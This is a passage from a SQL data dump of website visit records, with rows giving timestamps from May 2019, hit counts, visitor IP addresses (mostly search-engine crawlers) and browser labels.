79','other'),(416478,1556692832,1,1,0,0,'141.8.142.103','other'),(416479,1556693005,1,1,0,0,'5.45.207.19','other'),(416480,1556693156,1,1,0,0,'178.154.244.11','other'),(416481,1556693419,2,2,0,0,'66.249.64.29','chrome'),(416482,1556693504,1,1,0,0,'13.66.139.0','other'),(416483,1556693683,1,1,0,0,'5.45.207.79','other'),(416484,1556693903,1,1,0,0,'66.249.64.31','chrome'),(416485,1556694062,1,1,0,0,'66.249.64.62','chrome'),(416486,1556694267,1,1,0,0,'180.76.15.145','other'),(416487,1556694458,1,1,0,0,'66.249.64.30','chrome'),(416488,1556694587,1,1,0,0,'141.8.142.103','other'),(416489,1556694999,1,1,0,0,'8.29.198.27','other'),(416490,1556695191,1,1,0,0,'8.29.198.26','other'),(416491,1556695453,1,1,0,0,'66.249.64.58','chrome'),(416492,1556695507,2,2,0,0,'66.249.64.30','chrome'),(416493,1556695973,1,1,0,0,'94.180.235.251','chrome'),(416494,1556696015,2,2,0,0,'66.249.64.31','chrome'),(416495,1556696826,1,1,0,0,'66.249.64.30','chrome'),(416496,1556696942,1,1,0,0,'66.249.64.62','chrome'),(416497,1556698031,1,1,0,0,'157.55.39.252','other'),(416498,1556698126,2,2,0,0,'95.108.213.4','other'),(416499,1556698337,1,1,0,0,'141.8.142.103','other'),(416500,1556699802,1,1,0,0,'5.45.207.19','other'),(416502,1556699918,1,1,0,0,'157.55.39.252','other'),(416503,1556700184,1,1,0,0,'95.163.255.187','other'),(416504,1556700239,1,1,0,0,'141.8.142.103','other'),(416505,1556700366,1,1,0,0,'1.52.48.154','firefox'),(416506,1556700737,1,1,0,0,'66.249.64.29','chrome'),(416507,1556700764,2,2,0,0,'66.249.64.30','chrome'),(416508,1556700862,2,2,0,0,'66.249.64.31','chrome'),(416509,1556701488,1,1,0,0,'40.77.167.31','other'),(416510,1556701606,25,25,0,0,'207.180.224.141','other'),(416511,1556701631,1,1,0,0,'66.249.64.62','chrome'),(416512,1556701659,1,1,0,0,'66.249.64.29','chrome'),(416513,1556702943,1,1,0,0,'5.45.207.79','other'),(416514,1556703430,1,1,0,0,'5.45.207.19','other'),(416515,1556703484,1,1,0,0,'66.249.64.31','chrome'),(416516,1556704452,1,1,0,0,'95.163.255.157','other'),(416517,1556704675,2,2,0,0,'66.249.64.29','chrome'),(416518,1556704898,1,1,0,0,'66.249.64.31','chrome'),(416519,1556705382,1,1,0,0,'13.66.139.0','other'),(416520,1556705584,1,1,0,0,'109.74.154.72','chrome'),(416521,1556705855,1,1,0,0,'8.29.198.26','other'),(416522,1556705961,2,2,0,0,'66.249.64.31','chrome'),(416523,1556706037,1,1,0,0,'8.29.198.25','other'),(416524,1556706793,2,2,0,0,'95.213.141.126','opera'),(416525,1556706890,1,1,0,0,'46.211.38.37','chrome'),(416526,1556706935,1,1,0,0,'66.249.64.30','chrome'),(416527,1556708264,4,4,0,0,'176.9.140.208','other'),(416528,1556708601,1,1,0,0,'66.249.64.31','chrome'),(416529,1556709093,1,1,0,0,'66.249.64.58','chrome'),(416530,1556709110,1,1,0,0,'37.9.113.148','other'),(416531,1556709271,1,1,0,0,'95.163.255.192','other'),(416532,1556709600,1,1,0,0,'66.249.64.30','chrome'),(416533,1556709601,1,1,0,0,'141.8.142.103','other'),(416534,1556710253,1,1,0,0,'66.249.64.35','chrome'),(416535,1556711315,1,1,0,0,'66.249.64.62','chrome'),(416536,1556711558,1,1,0,0,'66.249.64.58','chrome'),(416537,1556711567,1,1,0,0,'66.249.64.60','chrome'),(416538,1556711904,1,1,0,0,'91.222.16.153','firefox'),(416539,1556712006,3,3,0,0,'66.249.64.31','chrome'),(416540,1556713847,2,2,0,0,'157.55.39.104','other'),(416541,1556714023,1,1,0,0,'66.249.64.60','chrome'),(416542,1556714051,1,1,0,0,'95.163.255.157','other'),(416543,1556715082,1,1,0,0,'5.45.207.19','other'),(416544,1556715137,1,1,0,0,'207.46.13.210','other'),(416545,1556715313,1,1,0,0,'141.8.142.108','other'),(416546,1556715483,1,1,0,0,'66.249.64.30','chrome'),(416547,1556716714,1,1,0,0,'8.29.198.27','other'),(416548,1556716905,1,1,0,0,'8.29.198.26','other'),(416549,1556717137,1,1,0,0,'66.249.64.30','chrome'),(416550,1556718258,1,1,0,0,'17.58.98.62','other'),(416551,1556718857,1,1,0,0,'66.249.64.58','chrome'),(416552,1556719204,2,2,0,0,'157.55.39.244','other'),(416553,1556719226,1,1,0,0,'157.55.39.104','other'),(416554,1556719585,1,1,0,0,'66.249.64.30','chrome'),(416555,1556719686,1,1,0,0,'66.249.64.29','chrome'),(416556,1556720200,1,1,0,0,'52.70.146.155','chrome'),(416557,1556720220,1,1,0,0,'91.196.178.135','chrome'),(416558,1556720638,1,1,0,0,'5.255.253.16','other'),(416559,1556720913,1,1,0,0,'66.249.64.30','chrome'),(416560,1556721178,1,1,0,0,'157.55.39.244','other'),(416561,1556721266,1,1,0,0,'141.8.142.103','other'),(416562,1556721271,1,1,0,0,'207.46.13.129','other'),(416563,1556722021,1,1,0,0,'188.0.83.64','chrome'),(416564,1556722462,1,1,0,0,'46.246.65.170','firefox'),(416565,1556723158,1,1,0,0,'95.163.255.98','other'),(416566,1556723164,1,1,0,0,'207.46.13.89','other'),(416567,1556724396,2,2,0,0,'207.46.13.129','other'),(416568,1556724856,1,1,0,0,'178.255.215.94','other'),(416569,1556724863,1,1,0,0,'157.55.39.244','other'),(416570,1556724891,1,1,0,0,'95.108.213.50','other'),(416571,1556725063,1,1,0,0,'91.196.178.135','chrome'),(416572,1556726960,1,1,0,0,'207.46.13.129','other'),(416573,1556727453,1,1,0,0,'40.77.167.51','other'),(416574,1556727534,1,1,0,0,'95.158.45.145','chrome'),(416575,1556727588,1,1,0,0,'8.29.198.27','other'),(416576,1556727766,1,1,0,0,'8.29.198.26','other'),(416577,1556728066,1,1,0,0,'95.108.181.57','other'),(416578,1556728203,1,1,0,0,'207.46.13.129','other'),(416579,1556729314,1,1,0,0,'40.77.167.51','other'),(416580,1556729690,2,2,0,0,'207.46.13.89','other'),(416581,1556730751,1,1,0,0,'95.163.255.159','other'),(416582,1556732467,1,1,0,0,'141.8.142.103','other'),(416583,1556732496,1,1,0,0,'178.154.244.11','other'),(416584,1556732807,1,1,0,0,'207.46.13.89','other'),(416585,1556733176,1,1,0,0,'198.167.223.133','chrome'),(416586,1556734678,1,1,0,0,'192.68.11.219','chrome'),(416587,1556734804,1,1,0,0,'207.46.13.35','other'),(416588,1556735867,1,1,0,0,'207.46.13.35','other'),(416589,1556735971,1,1,0,0,'5.45.207.19','other'),(416590,1556735979,2,2,0,0,'91.196.178.135','chrome'),(416591,1556737298,1,1,0,0,'95.108.181.54','other'),(416592,1556737694,1,1,0,0,'40.77.167.123','other'),(416593,1556737979,1,1,0,0,'207.46.13.35','other'),(416594,1556737984,2,2,0,0,'5.45.207.19','other'),(416595,1556738437,1,1,0,0,'8.29.198.27','other'),(416596,1556738619,1,1,0,0,'8.29.198.26','other'),(416597,1556739027,1,1,0,0,'87.250.224.65','other'),(416598,1556739675,1,1,0,0,'40.77.167.45','other'),(416599,1556740100,1,1,0,0,'207.46.13.89','other'),(416600,1556740228,1,1,0,0,'5.45.207.19','other'),(416601,1556741413,1,1,0,0,'46.211.134.195','chrome'),(416602,1556742027,1,1,0,0,'157.55.39.135','other'),(416603,1556742640,1,1,0,0,'40.77.167.45','other'),(416604,1556742820,1,1,0,0,'141.8.142.103','other'),(416605,1556742853,1,1,0,0,'94.180.235.251','chrome'),(416606,1556744246,1,1,0,0,'40.77.167.27','other'),(416607,1556744745,1,1,0,0,'157.55.39.135','other'),(416608,1556744795,1,1,0,0,'66.249.64.31','chrome'),(416609,1556745629,1,1,0,0,'178.154.244.11','other'),(416610,1556746116,1,1,0,0,'40.77.167.27','other'),(416611,1556746757,1,1,0,0,'37.9.113.148','other'),(416612,1556746774,1,1,0,0,'37.9.113.103','other'),(416613,1556746778,1,1,0,0,'5.45.207.79','other'),(416614,1556747048,1,1,0,0,'178.154.244.11','other'),(416615,1556747060,1,1,0,0,'66.249.64.30','chrome'),(416616,1556748029,1,1,0,0,'207.46.13.204','other'),(416617,1556748347,1,1,0,0,'207.46.13.241','other'),(416618,1556748502,1,1,0,0,'66.249.64.29','chrome'),(416619,1556749293,2,2,0,0,'8.29.198.27','other'),(416620,1556749298,1,1,0,0,'207.46.13.204','other'),(416621,1556750229,1,1,0,0,'66.249.64.31','chrome'),(416622,1556750425,1,1,0,0,'207.46.13.215','other'),(416623,1556750526,1,1,0,0,'207.46.13.204','other'),(416624,1556750679,1,1,0,0,'178.154.244.11','other'),(416625,1556751094,1,1,0,0,'141.8.142.103','other'),(416626,1556752113,1,1,0,0,'180.76.15.8','other'),(416627,1556754328,1,1,0,0,'178.154.244.11','other'),(416628,1556754341,1,1,0,0,'207.46.13.2','other'),(416629,1556754376,1,1,0,0,'95.108.213.4','other'),(416630,1556754392,1,1,0,0,'5.45.207.79','other'),(416631,1556754760,1,1,0,0,'207.46.13.175','other'),(416632,1556754870,1,1,0,0,'213.152.162.165','firefox'),(416633,1556756358,1,1,0,0,'40.77.167.88','other'),(416634,1556756543,2,2,0,0,'207.46.13.176','other'),(416635,1556757225,1,1,0,0,'66.249.64.31','chrome'),(416636,1556757685,1,1,0,0,'40.77.167.153','other'),(416637,1556758608,1,1,0,0,'66.249.64.30','chrome'),(416638,1556759260,1,1,0,0,'5.45.207.79','other'),(416639,1556760155,1,1,0,0,'8.29.198.26','other'),(416640,1556760322,1,1,0,0,'8.29.198.27','other'),(416641,1556760472,1,1,0,0,'66.249.64.29','chrome'),(416642,1556760595,1,1,0,0,'40.77.167.105','other'),(416643,1556762689,1,1,0,0,'66.249.64.58','chrome'),(416644,1556763051,2,2,0,0,'5.45.207.19','other'),(416645,1556763566,3,3,0,0,'178.154.244.11','other'),(416646,1556763866,2,2,0,0,'66.249.64.29','chrome'),(416647,1556764443,1,1,0,0,'66.249.64.31','chrome'),(416648,1556765604,1,1,0,0,'66.249.64.30','chrome'),(416649,1556765898,1,1,0,0,'66.249.64.29','chrome'),(416650,1556766198,2,2,0,0,'40.77.167.197','other'),(416651,1556767116,2,2,0,0,'66.249.64.31','chrome'),(416652,1556767448,1,1,0,0,'5.45.207.19','other'),(416653,1556767451,1,1,0,0,'178.154.244.21','other'),(416654,1556767551,1,1,0,0,'40.77.167.197','other'),(416655,1556768610,2,2,0,0,'207.46.13.105','other'),(416656,1556769012,1,1,0,0,'40.77.167.197','other'),(416657,1556769193,1,1,0,0,'40.77.167.87','other'),(416658,1556770421,1,1,0,0,'5.45.207.79','other'),(416659,1556770609,1,1,0,0,'95.108.213.4','other'),(416660,1556770979,1,1,0,0,'40.77.167.87','other'),(416661,1556771003,1,1,0,0,'8.29.198.26','other'),(416662,1556771075,1,1,0,0,'66.249.64.30','chrome'),(416663,1556771160,1,1,0,0,'8.29.198.25','other'),(416664,1556771300,1,1,0,0,'66.249.64.60','chrome'),(416665,1556771426,1,1,0,0,'66.249.64.31','chrome'),(416666,1556771615,1,1,0,0,'40.77.167.197','other'),(416667,1556772105,1,1,0,0,'157.55.39.221','other'),(416668,1556772450,1,1,0,0,'178.154.244.11','other'),(416669,1556772643,1,1,0,0,'18.237.70.0','other'),(416670,1556772682,1,1,0,0,'87.250.224.47','other'),(416671,1556772735,1,1,0,0,'5.45.207.79','other'),(416672,1556773279,1,1,0,0,'91.196.178.135','chrome'),(416673,1556773391,1,1,0,0,'40.77.167.87','other'),(416674,1556773512,1,1,0,0,'66.249.64.60','chrome'),(416675,1556774028,1,1,0,0,'91.196.179.134','chrome'),(416676,1556774226,2,2,0,0,'66.249.64.30','chrome'),(416677,1556774512,1,1,0,0,'40.77.167.87','other'),(416678,1556775170,1,1,0,0,'95.168.191.117','other'),(416679,1556775524,1,1,0,0,'157.55.39.166','other'),(416680,1556776040,1,1,0,0,'66.249.64.58','chrome'),(416681,1556776659,1,1,0,0,'66.249.64.30','chrome'),(416682,1556776829,1,1,0,0,'191.96.33.229','chrome'),(416683,1556777199,1,1,0,0,'46.200.250.89','chrome'),(416684,1556777357,1,1,0,0,'91.196.178.68','firefox'),(416685,1556777449,1,1,0,0,'91.196.178.87','chrome'),(416686,1556777500,1,1,0,0,'95.108.213.4','other'),(416687,1556777851,1,1,0,0,'178.154.244.11','other'),(416688,1556778972,2,2,0,0,'54.184.142.75','chrome'),(416689,1556779110,1,1,0,0,'40.77.167.87','other'),(416690,1556779117,1,1,0,0,'195.10.210.70','chrome'),(416691,1556779716,1,1,0,0,'5.45.207.79','other'),(416692,1556779752,1,1,0,0,'94.179.147.130','chrome'),(416693,1556780042,1,1,0,0,'195.10.210.70','chrome'),(416694,1556780601,1,1,0,0,'176.108.106.26','chrome'),(416695,1556780843,1,1,0,0,'93.78.185.9','chrome'),(416696,1556781260,1,1,0,0,'157.55.39.221','other'),(416697,1556781513,1,1,0,0,'95.132.6.190','firefox'),(416698,1556781842,1,1,0,0,'8.29.198.27','other'),(416699,1556782001,1,1,0,0,'8.29.198.25','other'),(416700,1556782041,1,1,0,0,'207.46.13.108','other'),(416701,1556782415,1,1,0,0,'5.45.207.19','other'),(416702,1556782538,1,1,0,0,'5.45.207.79','other'),(416703,1556782739,1,1,0,0,'141.8.142.103','other'),(416704,1556783097,1,1,0,0,'91.196.178.129','chrome'),(416705,1556783750,1,1,0,0,'94.179.147.130','chrome'),(416706,1556783904,1,1,0,0,'5.45.207.79','other'),(416707,1556783922,2,2,0,0,'178.154.244.11','other'),(416708,1556784389,1,1,0,0,'91.196.178.131','chrome'),(416709,1556784580,1,1,0,0,'194.44.45.121','chrome'),(416710,1556784719,1,1,0,0,'193.93.218.86','chrome'),(416711,1556784825,1,1,0,0,'157.55.39.186','other'),(416712,1556784840,1,1,0,0,'66.249.64.31','chrome'),(416713,1556785449,1,1,0,0,'173.252.127.32','other'),(416714,1556785450,1,1,0,0,'173.252.95.20','other'),(416715,1556785581,1,1,0,0,'193.106.30.98','firefox'),(416716,1556785857,1,1,0,0,'94.179.147.130','chrome'),(416717,1556785887,1,1,0,0,'91.196.177.46','firefox'),(416718,1556786503,1,1,0,0,'91.196.178.167','chrome'),(416719,1556786715,1,1,0,0,'3.89.13.27','chrome'),(416720,1556786754,1,1,0,0,'91.124.182.170','firefox'),(416721,1556786783,1,1,0,0,'66.249.64.31','chrome'),(416722,1556787902,1,1,0,0,'141.8.142.103','other'),(416723,1556787968,1,1,0,0,'178.154.244.11','other'),(416724,1556789052,1,1,0,0,'46.246.65.170','firefox'),(416725,1556789056,1,1,0,0,'157.55.39.151','other'),(416726,1556789356,1,1,0,0,'66.249.64.30','chrome'),(416727,1556789478,1,1,0,0,'91.196.178.94','chrome'),(416728,1556789686,1,1,0,0,'157.55.39.161','other'),(416729,1556790193,1,1,0,0,'157.55.39.177','other'),(416730,1556790945,1,1,0,0,'46.246.65.170','firefox'),(416731,1556791068,1,1,0,0,'91.196.179.134','chrome'),(416732,1556791097,1,1,0,0,'157.55.39.151','other'),(416733,1556791670,2,2,0,0,'195.211.175.37','chrome'),(416734,1556791813,2,2,0,0,'5.45.207.79','other'),(416735,1556792166,1,1,0,0,'109.74.154.72','chrome'),(416736,1556792611,1,1,0,0,'178.154.244.11','other'),(416737,1556792685,1,1,0,0,'8.29.198.25','other'),(416738,1556792859,1,1,0,0,'8.29.198.27','other'),(416739,1556793018,1,1,0,0,'37.9.113.148','other'),(416740,1556793295,1,1,0,0,'141.8.142.103','other'),(416741,1556794858,1,1,0,0,'66.249.64.30','chrome'),(416742,1556795217,1,1,0,0,'95.163.255.99','other'),(416743,1556796018,1,1,0,0,'195.211.175.37','chrome'),(416744,1556796096,1,1,0,0,'66.249.64.60','chrome'),(416745,1556797010,1,1,0,0,'157.55.39.151','other'),(416746,1556797315,1,1,0,0,'141.8.142.103','other'),(416747,1556797363,1,1,0,0,'193.93.12.154','firefox'),(416748,1556798020,1,1,0,0,'91.196.178.172','chrome'),(416749,1556798827,2,2,0,0,'157.55.39.151','other'),(416750,1556799234,1,1,0,0,'157.55.39.177','other'),(416751,1556799711,1,1,0,0,'5.255.253.38','other'),(416752,1556800337,1,1,0,0,'66.249.64.30','chrome'),(416753,1556800597,1,1,0,0,'91.196.178.104','chrome'),(416754,1556800844,1,1,0,0,'180.76.15.24','other'),(416755,1556802027,1,1,0,0,'157.55.39.151','other'),(416756,1556802231,1,1,0,0,'207.46.13.223','other'),(416757,1556802325,1,1,0,0,'37.9.113.103','other'),(416758,1556802507,1,1,0,0,'157.55.39.219','other'),(416759,1556802844,1,1,0,0,'180.76.15.6','other'),(416760,1556803022,1,1,0,0,'95.108.181.75','other'),(416761,1556803398,1,1,0,0,'66.249.64.30','chrome'),(416762,1556803539,1,1,0,0,'8.29.198.27','other'),(416763,1556803714,1,1,0,0,'8.29.198.26','other'),(416764,1556804426,1,1,0,0,'178.154.244.11','other'),(416765,1556804489,1,1,0,0,'5.45.207.79','other'),(416766,1556804641,1,1,0,0,'66.249.64.60','chrome'),(416767,1556804833,1,1,0,0,'87.250.224.81','other'),(416768,1556804834,1,1,0,0,'87.250.224.107','other'),(416769,1556805128,1,1,0,0,'87.250.224.118','other'),(416770,1556805193,1,1,0,0,'213.180.203.17','other'),(416771,1556805303,1,1,0,0,'66.249.64.58','chrome'),(416772,1556805356,1,1,0,0,'207.46.13.223','other'),(416773,1556806315,1,1,0,0,'66.249.64.30','chrome'),(416774,1556806529,1,1,0,0,'157.55.39.151','other'),(416775,1556807008,2,2,0,0,'157.55.39.219','other'),(416776,1556807878,1,1,0,0,'141.8.142.144','other'),(416777,1556807961,2,2,0,0,'66.249.64.30','chrome'),(416778,1556808863,2,2,0,0,'207.46.13.223','other'),(416779,1556808865,1,1,0,0,'13.66.139.0','other'),(416780,1556809014,1,1,0,0,'66.249.64.29','chrome'),(416781,1556809905,1,1,0,0,'66.249.64.31','chrome'),(416782,1556809948,1,1,0,0,'95.108.213.4','other'),(416783,1556810474,1,1,0,0,'93.175.236.51','chrome'),(416784,1556810504,1,1,0,0,'37.9.113.20','other'),(416785,1556810755,1,1,0,0,'141.8.142.108','other'),(416786,1556810939,1,1,0,0,'5.45.207.8','other'),(416787,1556811245,1,1,0,0,'141.8.142.191','other'),(416788,1556811551,2,2,0,0,'157.55.39.126','other'),(416789,1556811803,1,1,0,0,'40.77.167.35','other'),(416790,1556811990,2,2,0,0,'91.196.178.91','chrome'),(416791,1556812019,1,1,0,0,'207.46.13.223','other'),(416792,1556812118,1,1,0,0,'66.249.64.58','chrome'),(416793,1556814060,1,1,0,0,'157.55.39.126','other'),(416794,1556814390,1,1,0,0,'8.29.198.25','other'),(416795,1556814579,1,1,0,0,'8.29.198.26','other'),(416796,1556815003,1,1,0,0,'207.46.13.223','other'),(416797,1556815675,1,1,0,0,'5.45.207.79','other'),(416798,1556815855,2,2,0,0,'207.46.13.98','other'),(416799,1556816106,1,1,0,0,'93.34.89.190','chrome'),(416800,1556816503,1,1,0,0,'66.249.64.30','chrome'),(416801,1556816541,1,1,0,0,'66.249.64.31','chrome'),(416802,1556816797,1,1,0,0,'46.211.132.220','chrome'),(416803,1556817283,1,1,0,0,'207.46.13.223','other'),(416804,1556817309,1,1,0,0,'141.8.142.191','other'),(416805,1556817478,1,1,0,0,'141.8.142.103','other'),(416806,1556818276,1,1,0,0,'157.55.39.126','other'),(416807,1556818283,1,1,0,0,'66.249.64.29','chrome'),(416808,1556818445,1,1,0,0,'87.250.224.47','other'),(416809,1556820043,1,1,0,0,'66.249.64.31','chrome'),(416810,1556820417,1,1,0,0,'95.108.181.75','other'),(416811,1556820539,1,1,0,0,'213.180.203.40','other'),(416812,1556820569,1,1,0,0,'157.55.39.126','other'),(416813,1556820786,2,2,0,0,'157.55.39.184','other'),(416814,1556820885,1,1,0,0,'141.8.142.144','other'),(416815,1556822075,1,1,0,0,'87.250.224.47','other'),(416816,1556822145,1,1,0,0,'66.249.64.31','chrome'),(416817,1556822159,1,1,0,0,'66.249.64.30','chrome'),(416818,1556822342,1,1,0,0,'173.252.95.33','other'),(416819,1556822504,1,1,0,0,'157.55.39.184','other'),(416820,1556823018,2,2,0,0,'66.249.64.29','chrome'),(416821,1556823299,1,1,0,0,'66.249.64.58','chrome'),(416822,1556823435,1,1,0,0,'93.73.160.193','firefox'),(416823,1556824197,1,1,0,0,'46.133.145.191','chrome'),(416824,1556825259,1,1,0,0,'8.29.198.27','other'),(416825,1556825408,1,1,0,0,'157.55.39.184','other'),(416826,1556825469,1,1,0,0,'8.29.198.25','other'),(416827,1556825472,2,2,0,0,'207.46.13.98','other'),(416828,1556825770,1,1,0,0,'66.249.64.29','chrome'),(416829,1556825942,1,1,0,0,'157.55.39.228','other'),(416830,1556826180,1,1,0,0,'66.249.64.31','chrome'),(416831,1556826524,1,1,0,0,'87.250.224.65','other'),(416832,1556826562,1,1,0,0,'37.9.113.103','other'),(416833,1556826621,1,1,0,0,'141.8.142.108','other'),(416834,1556826673,1,1,0,0,'207.46.13.98','other'),(416835,1556827069,1,1,0,0,'91.209.11.236','other'),(416836,1556827092,2,2,0,0,'66.249.64.31','chrome'),(416837,1556827227,1,1,0,0,'66.249.64.60','chrome'),(416838,1556828935,2,2,0,0,'207.46.13.98','other'),(416839,1556829059,1,1,0,0,'157.55.39.184','other'),(416840,1556829258,1,1,0,0,'66.249.64.62','chrome'),(416841,1556829887,1,1,0,0,'87.250.224.107','other'),(416842,1556830960,1,1,0,0,'66.249.64.30','chrome'),(416843,1556831393,1,1,0,0,'151.24.209.198','chrome'),(416844,1556831448,1,1,0,0,'66.249.64.58','chrome'),(416845,1556831589,1,1,0,0,'157.55.39.184','other'),(416846,1556833024,82,82,0,0,'62.210.202.81','msie'),(416847,1556833153,1,1,0,0,'5.45.207.19','other'),(416848,1556834703,1,1,0,0,'40.77.167.197','other'),(416849,1556834938,1,1,0,0,'31.13.127.21','other'),(416850,1556834941,1,1,0,0,'31.13.127.12','other'),(416851,1556835053,1,1,0,0,'66.249.64.29','chrome'),(416852,1556835310,1,1,0,0,'157.55.39.184','other'),(416853,1556835879,1,1,0,0,'91.196.178.82','chrome'),(416854,1556836030,2,2,0,0,'207.46.13.98','other'),(416855,1556836124,1,1,0,0,'8.29.198.25','other'),(416856,1556836339,1,1,0,0,'8.29.198.26','other'),(416857,1556836461,1,1,0,0,'213.180.203.9','other'),(416858,1556836533,1,1,0,0,'91.196.178.165','chrome'),(416859,1556836766,2,2,0,0,'178.154.244.65','other'),(416860,1556837098,1,1,0,0,'178.154.200.8','other'),(416861,1556837307,1,1,0,0,'157.55.39.184','other'),(416862,1556837336,1,1,0,0,'141.8.142.65','other'),(416863,1556837438,1,1,0,0,'87.250.224.99','other'),(416864,1556837582,1,1,0,0,'178.154.244.21','other'),(416865,1556837619,1,1,0,0,'87.250.224.81','other'),(416866,1556837883,1,1,0,0,'66.249.64.31','chrome'),(416867,1556838269,1,1,0,0,'95.108.181.94','other'),(416868,1556838492,1,1,0,0,'95.108.181.83','other'),(416869,1556838495,1,1,0,0,'95.108.181.54','other'),(416870,1556838504,1,1,0,0,'207.46.13.33','other'),(416871,1556838607,1,1,0,0,'40.77.167.197','other'),(416872,1556838982,1,1,0,0,'87.250.224.47','other'),(416873,1556839633,2,2,0,0,'178.154.171.69','other'),(416874,1556839713,2,2,0,0,'66.249.64.31','chrome'),(416875,1556840059,1,1,0,0,'66.249.64.30','chrome'),(416876,1556840365,1,1,0,0,'87.250.224.81','other'),(416877,1556840369,2,2,0,0,'95.108.181.75','other'),(416878,1556840439,1,1,0,0,'37.9.113.103','other'),(416879,1556840472,1,1,0,0,'141.8.142.81','other'),(416880,1556840744,1,1,0,0,'5.45.207.19','other'),(416881,1556841655,1,1,0,0,'66.249.64.29','chrome'),(416882,1556842230,1,1,0,0,'5.188.210.44','chrome'),(416883,1556843188,1,1,0,0,'157.55.39.251','other'),(416884,1556844050,1,1,0,0,'87.250.224.47','other'),(416885,1556844163,1,1,0,0,'95.108.213.4','other'),(416886,1556844193,1,1,0,0,'141.8.142.191','other'),(416887,1556844240,1,1,0,0,'95.108.181.75','other'),(416888,1556844821,1,1,0,0,'193.106.30.98','chrome'),(416889,1556845065,2,2,0,0,'207.46.13.71','other'),(416890,1556845804,1,1,0,0,'40.77.167.140','other'),(416891,1556845821,1,1,0,0,'66.249.64.31','chrome'),(416892,1556845934,1,1,0,0,'207.46.13.42','other'),(416893,1556846974,2,2,0,0,'8.29.198.27','other'),(416894,1556847516,1,1,0,0,'141.8.142.38','other'),(416895,1556847573,1,1,0,0,'87.250.224.81','other'),(416896,1556847754,1,1,0,0,'87.250.224.47','other'),(416897,1556847893,1,1,0,0,'178.154.171.69','other'),(416898,1556847921,1,1,0,0,'95.108.213.4','other'),(416899,1556848060,2,2,0,0,'93.158.166.7','other'),(416900,1556848604,1,1,0,0,'193.106.30.98','chrome'),(416901,1556848682,1,1,0,0,'178.154.171.17','other'),(416902,1556849787,1,1,0,0,'193.106.30.98','chrome'),(416903,1556851163,1,1,0,0,'40.77.167.18','other'),(416904,1556852269,1,1,0,0,'157.55.39.100','other'),(416905,1556852698,1,1,0,0,'157.55.39.186','other'),(416906,1556853015,1,1,0,0,'195.128.17.206','other'),(416907,1556853709,1,1,0,0,'66.249.64.30','chrome'),(416908,1556854039,1,1,0,0,'91.196.178.135','firefox'),(416909,1556854213,1,1,0,0,'40.77.167.18','other'),(416910,1556854779,1,1,0,0,'178.154.200.48','other'),(416911,1556854789,1,1,0,0,'66.249.64.30','chrome'),(416912,1556855475,1,1,0,0,'91.196.178.135','firefox'),(416913,1556855489,2,2,0,0,'42.236.10.93','other'),(416914,1556855490,1,1,0,0,'180.163.220.4','other'),(416915,1556855555,1,1,0,0,'66.249.64.58','chrome'),(416916,1556855831,1,1,0,0,'178.92.8.243','chrome'),(416917,1556857017,1,1,0,0,'178.154.200.8','other'),(416918,1556857077,1,1,0,0,'95.108.181.75','other'),(416919,1556857144,1,1,0,0,'95.108.181.94','other'),(416920,1556857166,1,1,0,0,'40.77.167.92','other'),(416921,1556857276,1,1,0,0,'37.9.113.38','other'),(416922,1556857410,1,1,0,0,'87.250.224.65','other'),(416923,1556857412,1,1,0,0,'157.55.39.186','other'),(416924,1556857533,1,1,0,0,'178.154.171.30','other'),(416925,1556857834,1,1,0,0,'8.29.198.26','other'),(416926,1556857862,1,1,0,0,'66.249.64.31','chrome'),(416927,1556858059,1,1,0,0,'91.196.178.98','chrome'),(416928,1556858068,1,1,0,0,'8.29.198.27','other'),(416929,1556858342,1,1,0,0,'66.249.64.29','chrome'),(416930,1556858604,1,1,0,0,'91.196.178.133','chrome'),(416931,1556858849,1,1,0,0,'40.77.167.18','other'),(416932,1556859339,1,1,0,0,'66.249.64.30','chrome'),(416933,1556859706,1,1,0,0,'40.77.167.92','other'),(416934,1556859804,1,1,0,0,'37.9.113.103','other'),(416935,1556859860,1,1,0,0,'66.249.64.29','chrome'),(416936,1556859924,1,1,0,0,'72.13.36.80','other'),(416937,1556859973,1,1,0,0,'188.64.207.70','chrome'),(416938,1556860005,1,1,0,0,'66.249.64.31','chrome'),(416939,1556860362,1,1,0,0,'87.250.224.118','other'),(416940,1556860514,1,1,0,0,'66.249.64.30','chrome'),(416941,1556860759,1,1,0,0,'40.77.167.18','other'),(416942,1556861275,1,1,0,0,'217.115.10.132','other'),(416943,1556861310,1,1,0,0,'104.148.64.26','chrome'),(416944,1556861639,1,1,0,0,'66.249.64.29','chrome'),(416945,1556862208,1,1,0,0,'40.77.167.92','other'),(416946,1556863458,1,1,0,0,'91.196.179.134','chrome'),(416947,1556863911,1,1,0,0,'66.249.64.31','chrome'),(416948,1556864140,1,1,0,0,'91.196.178.87','chrome'),(416949,1556864730,1,1,0,0,'91.196.178.163','chrome'),(416950,1556864733,1,1,0,0,'66.249.64.62','chrome'),(416951,1556865563,1,1,0,0,'37.9.113.38','other'),(416952,1556865769,1,1,0,0,'95.163.255.156','other'),(416953,1556866164,1,1,0,0,'213.180.203.9','other'),(416954,1556866568,2,2,0,0,'54.245.37.154','chrome'),(416955,1556866646,2,2,0,0,'66.249.64.29','chrome'),(416956,1556866652,1,1,0,0,'91.196.178.174','chrome'),(416957,1556866682,1,1,0,0,'157.55.39.225','other'),(416958,1556867202,1,1,0,0,'66.249.64.62','chrome'),(416959,1556867271,1,1,0,0,'157.55.39.173','other'),(416960,1556867355,1,1,0,0,'176.126.162.236','chrome'),(416961,1556867542,1,1,0,0,'5.45.207.80','other'),(416962,1556867906,1,1,0,0,'66.249.64.31','chrome'),(416963,1556867955,1,1,0,0,'91.196.178.131','chrome'),(416964,1556868034,1,1,0,0,'46.200.250.89','chrome'),(416965,1556868599,1,1,0,0,'157.55.39.173','other'),(416966,1556868691,1,1,0,0,'8.29.198.26','other'),(416967,1556868710,1,1,0,0,'91.196.178.169','chrome'),(416968,1556868722,1,1,0,0,'5.45.207.76','other'),(416969,1556868751,1,1,0,0,'157.55.39.186','other'),(416970,1556868919,1,1,0,0,'8.29.198.25','other'),(416971,1556869087,1,1,0,0,'66.249.64.30','chrome'),(416972,1556869201,1,1,0,0,'95.108.181.83','other'),(416973,1556869712,1,1,0,0,'157.55.39.186','other'),(416974,1556870781,1,1,0,0,'178.133.9.214','chrome'),(416975,1556872461,1,1,0,0,'93.158.166.7','other'),(416976,1556872663,1,1,0,0,'95.132.42.95','chrome'),(416977,1556872680,1,1,0,0,'40.77.167.88','other'),(416978,1556872923,1,1,0,0,'213.180.203.9','other'),(416979,1556873005,1,1,0,0,'66.249.64.58','chrome'),(416980,1556873024,1,1,0,0,'141.8.183.23','other'),(416981,1556873054,1,1,0,0,'157.55.39.173','other'),(416982,1556873088,1,1,0,0,'213.180.203.23','other'),(